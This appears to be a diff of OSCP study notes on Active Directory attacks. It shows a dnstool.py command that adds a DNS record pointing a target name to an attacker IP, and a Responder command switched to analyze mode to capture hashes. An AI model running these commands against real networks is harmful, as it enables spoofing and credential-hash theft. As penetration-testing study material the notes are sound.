tedchen0001/OSCP-Notes/AD.md

 # add AD Integrated DNS records
 python3 dnstool.py -u '<domain>\<username>' -p <password> <target ip> -a add -r <TARGETRECORD> -d <attacker ip> -t A
 # get information in a few minutes
-responder -I tun0 # not allowed in the labs or on the exam
+sudo responder -I tun0 -A -v
+# because poisoning and spoofing are not allowed in the labs or on the exam, using -A to run in analyze mode
+# using -v to show the hash every time
 ```

 ### :open_file_folder: Extracting